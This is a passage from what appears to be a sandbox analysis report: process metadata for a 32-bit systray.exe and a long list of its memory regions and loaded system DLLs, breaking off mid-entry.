"0x4bf5b000" os_pid = "0x374" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x78c" cmd_line = "\"C:\\Windows\\SysWOW64\\systray.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 963 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 964 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 965 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 966 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 967 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 968 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 969 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 970 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 971 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 972 start_va = 0x1020000 end_va = 0x1025fff monitored = 0 entry_point = 0x1021510 region_type = mapped_file name = "systray.exe" filename = "\\Windows\\SysWOW64\\systray.exe" (normalized: "c:\\windows\\syswow64\\systray.exe") Region: id = 973 start_va = 0x1030000 end_va = 0x502ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001030000" filename = "" Region: id = 974 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 975 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 976 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 977 start_va = 0x7fff0000 end_va = 0x7dfdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 978 start_va = 0x7dfdab590000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfdab590000" filename = "" Region: id = 979 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 980 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 990 start_va = 0x110000 end_va = 0x13efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 992 start_va = 0x1020000 end_va = 0x1025fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001020000" filename = "" Region: id = 993 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 994 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 995 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 996 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 997 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1005 start_va = 0x580000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1006 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1007 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1008 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1009 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1010 start_va = 0x140000 end_va = 0x1fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1011 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1012 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1013 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1014 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1015 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1016 start_va = 0x480000 end_va = 0x4a9fff monitored = 0 entry_point = 0x485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1017 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 1018 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1019 start_va = 0x980000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 1020 start_va = 0x5030000 end_va = 0x642ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005030000" filename = "" Region: id = 1021 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1022 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1023 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1024 start_va = 0xb10000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 1027 start_va = 0xb10000 end_va = 0xc93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 1028 start_va = 0xcc0000 end_va = 0xccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 1029 start_va = 0xcd0000 end_va = 0xe52fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 1030 start_va = 0x6430000 end_va = 0x6729fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006430000" filename = "" Region: id = 1032 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1033 start_va = 0x580000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1034 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1035 start_va = 0x490000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1036 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1037 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1038 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1039 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1040 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1041 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1143 start_va = 0x490000 end_va = 0x4befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1144 start_va = 0x4c0000 end_va = 0x4eefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1145 start_va = 0xb10000 end_va = 0xba2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 1146 start_va = 0xbb0000 end_va = 0xc42fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 1147 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1148 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1149 start_va = 0x6730000 end_va = 0x70f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006730000" filename = "" Region: id = 1151 start_va = 0xcd0000 end_va = 0xec4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 1152 start_va = 0x7100000 end_va = 0x72f4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 1153 start_va = 0x510000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1154 start_va = 0x680000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1155 start_va = 0x6c0000 end_va = 0x6e8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1156 start_va = 0x70770000 end_va = 0x7097cfff monitored = 0 entry_point = 0x7085acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1158 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1159 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1181 start_va = 0xed0000 end_va = 0xfabfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ed0000" filename = "" Region: id = 1498 start_va = 0xed0000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ed0000" filename = "" Region: id = 1562 start_va = 0x7300000 end_va = 0x74abfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 1624 start_va = 0xc50000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 1625 start_va = 0xed0000 end_va = 0xf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 1626 start_va = 0xf10000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 1627 start_va = 0xf50000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1628 start_va = 0x7300000 end_va = 0x73f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 1679 start_va = 0x7300000 end_va = 0x7445fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 1730 start_va = 0x7300000 end_va = 0x73fafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 1782 start_va = 0x7300000 end_va = 0x74a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 1834 start_va = 0x7300000 end_va = 0x73d9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 1885 start_va = 0x7300000 end_va = 0x74a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 1936 start_va = 0x7300000 end_va = 0x7444fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 1988 start_va = 0x7300000 end_va = 0x7456fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2039 start_va = 0x7300000 end_va = 0x7461fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2090 start_va = 0x7300000 end_va = 0x742efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2142 start_va = 0x7300000 end_va = 0x744cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2193 start_va = 0x7300000 end_va = 0x7455fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2244 start_va = 0x7300000 end_va = 0x73e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2295 start_va = 0x7300000 end_va = 0x7488fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2347 start_va = 0x7300000 end_va = 0x7419fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2398 start_va = 0x7300000 end_va = 0x7405fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2449 start_va = 0x7300000 end_va = 0x73befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2500 start_va = 0x7300000 end_va = 0x747bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2551 start_va = 0x7300000 end_va = 0x74a5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2603 start_va = 0x7300000 end_va = 0x73bafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2654 start_va = 0x7300000 end_va = 0x7462fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2705 start_va = 0x7300000 end_va = 0x7498fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2756 start_va = 0x7300000 end_va = 0x7455fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2807 start_va = 0x7300000 end_va = 0x73c5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2859 start_va = 0x7300000 end_va = 0x73d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 2911 start_va = 0x7300000 end_va = 0x7437fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 3150 start_va = 0x7300000 end_va = 0x744cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Region: id = 3153 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3154 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3155 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3156 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3158 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3159 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3160 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3161 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3163 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3164 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3166 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3167 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3171 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3172 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3173 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3174 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3175 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3176 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3178 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3179 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3180 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3181 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3182 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3183 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3184 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3185 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3186 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3187 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3188 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3189 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3191 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3192 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3193 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3194 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3195 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3196 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3198 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3199 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3200 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3201 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3202 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3203 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3204 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3205 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3206 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3207 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3208 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3209 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3210 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3211 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3212 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3213 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3215 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3216 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3217 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3218 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3219 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3221 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3222 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3223 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3224 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3225 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3226 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3227 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3228 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3229 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3231 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3232 start_va = 0x4f0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id 